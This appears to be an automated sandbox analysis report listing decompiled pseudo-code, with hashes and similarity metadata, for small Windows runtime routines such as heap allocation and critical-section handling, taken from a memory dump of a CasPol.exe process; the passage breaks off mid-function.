                                                                • Instruction ID: b48a5b1851cc34e28269a4c01618e68fb16d6506fc5589276d0199b8ef4461b3
                                                                • Opcode Fuzzy Hash: 7df576a58911947865fcfcac9e5117c38b9f942dc914450680fa4942f2d3b061
                                                                • Instruction Fuzzy Hash: D5F02738902145EBDF12FB7CCC40F79BFB2AF04314F040669D991AB2A1E725D802C799
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 36%
                                                                			E016F8CD6(intOrPtr __ecx) {
                                                                				signed int _v8;
                                                                				intOrPtr _v12;
                                                                				short _v38;
                                                                				char _v44;
                                                                				signed char* _t11;
                                                                				intOrPtr _t17;
                                                                				intOrPtr _t22;
                                                                				intOrPtr _t23;
                                                                				intOrPtr _t24;
                                                                				signed int _t25;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t25;
                                                                				_v12 = __ecx;
                                                                				_v38 = 0x1c2d;
                                                                				if(E01647D50() == 0) {
                                                                					_t11 = 0x7ffe0386;
                                                                				} else {
                                                                					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                				}
                                                                				_push( &_v44);
                                                                				_push(0xffffffe4);
                                                                				_push(0x402);
                                                                				_push( *_t11 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                			}














                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 768caa150081dce4b1b3cce8ad811eb302868daa06862789d5d29560c155efef
                                                                • Instruction ID: 21e5d3d1433cba7d64e44c81dcb6460cb5d0ae8d14768cd813102dc0733d7fa9
                                                                • Opcode Fuzzy Hash: 768caa150081dce4b1b3cce8ad811eb302868daa06862789d5d29560c155efef
                                                                • Instruction Fuzzy Hash: F6F08271A04659AFDB04DBA8ED45E6E77B8EF18300F10419DE915EB3C0EA34D900C758
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E01624F2E(void* __ecx, char _a4) {
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				void* _t17;
                                                                				void* _t19;
                                                                				void* _t20;
                                                                				void* _t21;
                                                                
                                                                				_t18 = __ecx;
                                                                				_t21 = __ecx;
                                                                				if(__ecx == 0) {
                                                                					L6:
                                                                					__eflags = _a4;
                                                                					if(__eflags != 0) {
                                                                						L8:
                                                                						E016F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                						L9:
                                                                						return 0;
                                                                					}
                                                                					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                					if(__eflags != 0) {
                                                                						goto L9;
                                                                					}
                                                                					goto L8;
                                                                				}
                                                                				_t18 = __ecx + 0x30;
                                                                				if(E0164C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1601030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                					goto L6;
                                                                				} else {
                                                                					return 1;
                                                                				}
                                                                			}










                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ead9d0e162a37e88ad5760c705c50a0003848e184b0f7eb2e125b052cdbc2894
                                                                • Instruction ID: 9b348ddeecfcc8c8c5003d6256b3668eb79751efdd4cd8838f13ee6d5ea386bf
                                                                • Opcode Fuzzy Hash: ead9d0e162a37e88ad5760c705c50a0003848e184b0f7eb2e125b052cdbc2894
                                                                • Instruction Fuzzy Hash: F7F0E2325666968FE772EF1CCD44F22B7D8AB107B8F054A78E40587B22CB25EC48C680
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0165A44B(signed int __ecx) {
                                                                				intOrPtr _t13;
                                                                				signed int _t15;
                                                                				signed int* _t16;
                                                                				signed int* _t17;
                                                                
                                                                				_t13 =  *0x1717b9c; // 0x0
                                                                				_t15 = __ecx;
                                                                				_t16 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                                                				if(_t16 == 0) {
                                                                					return 0;
                                                                				}
                                                                				 *_t16 = _t15;
                                                                				_t17 =  &(_t16[2]);
                                                                				E0166FA60(_t17, 0, _t15 << 2);
                                                                				return _t17;
                                                                			}








                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dbc13735e4c0d254f67d773521c3aba6e6710b5087277fb31adf08ef309b573a
                                                                • Instruction ID: b9e59a3e3a808f83cdcc13b3cdec3426e68d2fee112b5abf17b44c96f1f468a6
                                                                • Opcode Fuzzy Hash: dbc13735e4c0d254f67d773521c3aba6e6710b5087277fb31adf08ef309b573a
                                                                • Instruction Fuzzy Hash: 0EE09272A02421ABD3215A98BD00F66779EEBE4A51F094139FA04C7214DA28DD02C7E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 79%
                                                                			E0162F358(void* __ecx, signed int __edx) {
                                                                				char _v8;
                                                                				signed int _t9;
                                                                				void* _t20;
                                                                
                                                                				_push(__ecx);
                                                                				_t9 = 2;
                                                                				_t20 = 0;
                                                                				if(E0165F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                                					_t20 = L01644620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                				}
                                                                				return _t20;
                                                                			}







                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                • Instruction ID: ccd3bde20cd95943586e7614235c30b3fb8d2cddba541b2c1dcd78634f747210
                                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                • Instruction Fuzzy Hash: D2E0D832A40128FBDB21A6D99D05F9ABFBDDB54AA0F0001D5FA04D7150D9609D00C6D0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0163FF60(intOrPtr _a4) {
                                                                				void* __ecx;
                                                                				void* __ebp;
                                                                				void* _t13;
                                                                				intOrPtr _t14;
                                                                				void* _t15;
                                                                				void* _t16;
                                                                				void* _t17;
                                                                
                                                                				_t14 = _a4;
                                                                				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x16011a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                					return E016F88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                                				} else {
                                                                					return E01640050(_t14);
                                                                				}
                                                                			}











                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f5b92ad4fed7ff67063e8add9c454c48e3b529e7b7f4dfd5cafcad4ef6d0a0e
                                                                • Instruction ID: 214a20988eed26f472c4b9a18597631b5453d5fbc2f5185aad67f92bb3e4a4a7
                                                                • Opcode Fuzzy Hash: 0f5b92ad4fed7ff67063e8add9c454c48e3b529e7b7f4dfd5cafcad4ef6d0a0e
                                                                • Instruction Fuzzy Hash: D7E0DFB0A052049FD73ADF5DDC40F273B9C9B92721F1A80DDE8084B202CB21D881C28B
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 82%
                                                                			E016B41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                				void* _t5;
                                                                				void* _t14;
                                                                
                                                                				_push(8);
                                                                				_push(0x17008f0);
                                                                				_t5 = E0167D08C(__ebx, __edi, __esi);
                                                                				if( *0x17187ec == 0) {
                                                                					E0163EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                                					if( *0x17187ec == 0) {
                                                                						 *0x17187f0 = 0x17187ec;
                                                                						 *0x17187ec = 0x17187ec;
                                                                						 *0x17187e8 = 0x17187e4;
                                                                						 *0x17187e4 = 0x17187e4;
                                                                					}
                                                                					 *(_t14 - 4) = 0xfffffffe;
                                                                					_t5 = L016B4248();
                                                                				}
                                                                				return E0167D0D1(_t5);
                                                                			}






                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a09ab9b5fa1603bcc65f40b01569a833c97e5fd74e1fb12139d72fa9621c8773
                                                                • Instruction ID: c293523084bf6cdd0cf341220aef39228a10998bacc62cb42ade393e2dd04a62
                                                                • Opcode Fuzzy Hash: a09ab9b5fa1603bcc65f40b01569a833c97e5fd74e1fb12139d72fa9621c8773
                                                                • Instruction Fuzzy Hash: 3CF01E78860701CECBB2EFEDA94075876A5FB94361F10C12B9101A728ACB3445A1DF1A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016DD380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                				void* _t5;
                                                                
                                                                				if(_a4 != 0) {
                                                                					_t5 = L0162E8B0(__ecx, _a4, 0xfff);
                                                                					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                					return _t5;
                                                                				}
                                                                				return 0xc000000d;
                                                                			}





                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                • Instruction ID: dea13337a1426a598fc4de436ef6d09bfe48d89bcdd1cddc9a9f920f964ba034
                                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                • Instruction Fuzzy Hash: 3CE0C231680615BBDB226E84CC00F797B17EB507A0F124035FE089A7D0CA759C91DAC8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0165A185() {
                                                                				void* __ecx;
                                                                				intOrPtr* _t5;
                                                                
                                                                				if( *0x17167e4 >= 0xa) {
                                                                					if(_t5 < 0x1716800 || _t5 >= 0x1716900) {
                                                                						return L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                                					} else {
                                                                						goto L1;
                                                                					}
                                                                				} else {
                                                                					L1:
                                                                					return E01640010(0x17167e0, _t5);
                                                                				}
                                                                			}






                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cc0beb19b3add0122eda54419b08767d4608ba6772bba2f844849bdc042eb141
                                                                • Instruction ID: 15132c02e442c997a89bc907942a75f096cd331f25aa8d4de9d7978ad8fa79ac
                                                                • Opcode Fuzzy Hash: cc0beb19b3add0122eda54419b08767d4608ba6772bba2f844849bdc042eb141
                                                                • Instruction Fuzzy Hash: 1AD02E611650001BC73E63A88D14B213613F780B61F344A2CF3030FAA8EAE088D4C20C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016516E0(void* __edx, void* __eflags) {
                                                                				void* __ecx;
                                                                				void* _t3;
                                                                
                                                                				_t3 = E01651710(0x17167e0);
                                                                				if(_t3 == 0) {
                                                                					_t6 =  *[fs:0x30];
                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                                						goto L1;
                                                                					} else {
                                                                						return L01644620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                                					}
                                                                				} else {
                                                                					L1:
                                                                					return _t3;
                                                                				}
                                                                			}






                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f299ed1ffdb91c4bff9458c236f8f01cc3ef425b6ac4d8e725b9d6208f6bdc8
                                                                • Instruction ID: e39f089d829fc03d1e4cd6ca85bcc44461a3701c7fa28bdc661ca9d42a1a03df
                                                                • Opcode Fuzzy Hash: 8f299ed1ffdb91c4bff9458c236f8f01cc3ef425b6ac4d8e725b9d6208f6bdc8
                                                                • Instruction Fuzzy Hash: 97D0A931240201A2EB2E6B189C14B242A52EB91B81F38006CFA1B599C0CFB0CCA2E46C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016A53CA(void* __ebx) {
                                                                				intOrPtr _t7;
                                                                				void* _t13;
                                                                				void* _t14;
                                                                				intOrPtr _t15;
                                                                				void* _t16;
                                                                
                                                                				_t13 = __ebx;
                                                                				if( *((char*)(_t16 - 0x65)) != 0) {
                                                                					E0163EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                                                					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                                                				}
                                                                				if(_t15 != 0) {
                                                                					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                                                					return  *((intOrPtr*)(_t16 - 0x64));
                                                                				}
                                                                				return _t7;
                                                                			}









                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                • Instruction ID: a9dc1bf1c16e8ceba886c9a70e3b091c195be02759e1c0784715b3ae59f1aa7a
                                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                • Instruction Fuzzy Hash: FAE08C319006809FCF12DB48CA50F5EBBF6FF84B00F140408A5095F720C724EC00CB00
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0163AAB0() {
                                                                				intOrPtr* _t4;
                                                                
                                                                				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                				if(_t4 != 0) {
                                                                					if( *_t4 == 0) {
                                                                						goto L1;
                                                                					} else {
                                                                						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                                					}
                                                                				} else {
                                                                					L1:
                                                                					return 0x7ffe0030;
                                                                				}
                                                                			}





                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                • Instruction ID: 927f33e2fa5deae2046d488497613c79400f2f018439fbf096b42fcc38c14f8e
                                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                • Instruction Fuzzy Hash: DCD0C935352980CFD617CB4CC954B0533A4FB44B40FC50490E940CB722E72CD940CA00
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016535A1(void* __eax, void* __ebx, void* __ecx) {
                                                                				void* _t6;
                                                                				void* _t10;
                                                                				void* _t11;
                                                                
                                                                				_t10 = __ecx;
                                                                				_t6 = __eax;
                                                                				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                                					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                                				}
                                                                				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                                					return E0163EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                				}
                                                                				return _t6;
                                                                			}







                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                • Instruction ID: bd5e8e638c52f2ecc5eaf2578ed34defc96362c34a171c390ff41e315ae68777
                                                                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                • Instruction Fuzzy Hash: 99D0A9314011819AEB82AB24CA387683BB2BF00B8CF58306988030EB52C33A8A0AC604
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0162DB40() {
                                                                				signed int* _t3;
                                                                				void* _t5;
                                                                
                                                                				_t3 = L01644620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                                				if(_t3 == 0) {
                                                                					return 0;
                                                                				} else {
                                                                					 *_t3 =  *_t3 | 0x00000400;
                                                                					return _t3;
                                                                				}
                                                                			}






                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                • Instruction ID: 7dbee2969f4053718137fa957fd7199414d8e1ef3c77e98f1d66b600b571f8d0
                                                                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                • Instruction Fuzzy Hash: C2C08C70280A11ABEB222F20CD02B403AA1BB10B02F4400A0A300DA0F0DF78D801EA00
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016AA537(intOrPtr _a4, intOrPtr _a8) {
                                                                
                                                                				return L01648E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                                			}




                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                • Instruction ID: 2f7d4568ad6095e056e5bc80b47cdca1b2b6f7fc4f4d5650ed5c2203a5ad65b2
                                                                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                • Instruction Fuzzy Hash: 8FC01232080248BBCB226F81CC00F067F2AEBA4B60F008014BA080B5608632E970EA88
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E01643A1C(intOrPtr _a4) {
                                                                				void* _t5;
                                                                
                                                                				return L01644620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                			}





                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                • Instruction ID: 42d546f33d33bde5ae5a56cdc1bf779854b7eed7089a962814f6638ec3196db5
                                                                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                • Instruction Fuzzy Hash: 86C04C32180648BBC7126E45DD01F557B6AE7A4B60F154025B6040A5618976ED61D59C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0162AD30(intOrPtr _a4) {
                                                                
                                                                				return L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                			}




                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                • Instruction ID: cc5e1e7bd2b32c7ef4ad752f7b2eb433703fd619be59dd81c5033bbd6af65b30
                                                                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                • Instruction Fuzzy Hash: 26C08C32080248BBC712AA45CD00F117B2AE7A0B60F000020F6040A6618A32E860D588
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016376E2(void* __ecx) {
                                                                				void* _t5;
                                                                
                                                                				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                                					return L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                				}
                                                                				return _t5;
                                                                			}





                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                • Instruction ID: 9e0ca016e1dc891b630efe16394c83fd2108061da7d4e98304f8b616548ba18c
                                                                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                • Instruction Fuzzy Hash: 57C08CB01411805BEB2A970CCE30B303A91AB49608F88019CEB01296A3C368A802D208
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016536CC(void* __ecx) {
                                                                
                                                                				if(__ecx > 0x7fffffff) {
                                                                					return 0;
                                                                				} else {
                                                                					return L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                				}
                                                                			}




                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                • Instruction ID: 873e1a32259812205de4aa9e6b9506a031bbd8d8287174eb442229629daabc80
                                                                • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                • Instruction Fuzzy Hash: 77C02B70150440FBD7152F30CD01F157254F700F61F64035C7220456F0DE289C00E104
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E01647D50() {
                                                                				intOrPtr* _t3;
                                                                
                                                                				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                				if(_t3 != 0) {
                                                                					return  *_t3;
                                                                				} else {
                                                                					return _t3;
                                                                				}
                                                                			}





                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                • Instruction ID: 9263b7b35dc5c96dccd475275d5197581f661376c0bde7fb83e4afc9ffab3c56
                                                                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                • Instruction Fuzzy Hash: 49B092363119408FCF16DF28C480B1533E4FB44A40B8400D0E400CBA21D329E8008900
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E01652ACB() {
                                                                				void* _t5;
                                                                
                                                                				return E0163EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                			}





                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                • Instruction ID: b19373cefe9989480268cb850507d9644d7f1f7b3d8cb5f47c9a85409e88019f
                                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                • Instruction Fuzzy Hash: 41B092328104418BCF06AB40CA10B197332AB40650F0544949002279208229AC01CA50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 53%
                                                                			E016BFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                				void* _t7;
                                                                				intOrPtr _t9;
                                                                				intOrPtr _t10;
                                                                				intOrPtr* _t12;
                                                                				intOrPtr* _t13;
                                                                				intOrPtr _t14;
                                                                				intOrPtr* _t15;
                                                                
                                                                				_t13 = __edx;
                                                                				_push(_a4);
                                                                				_t14 =  *[fs:0x18];
                                                                				_t15 = _t12;
                                                                				_t7 = E0166CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                				_push(_t13);
                                                                				E016B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                				_t9 =  *_t15;
                                                                				if(_t9 == 0xffffffff) {
                                                                					_t10 = 0;
                                                                				} else {
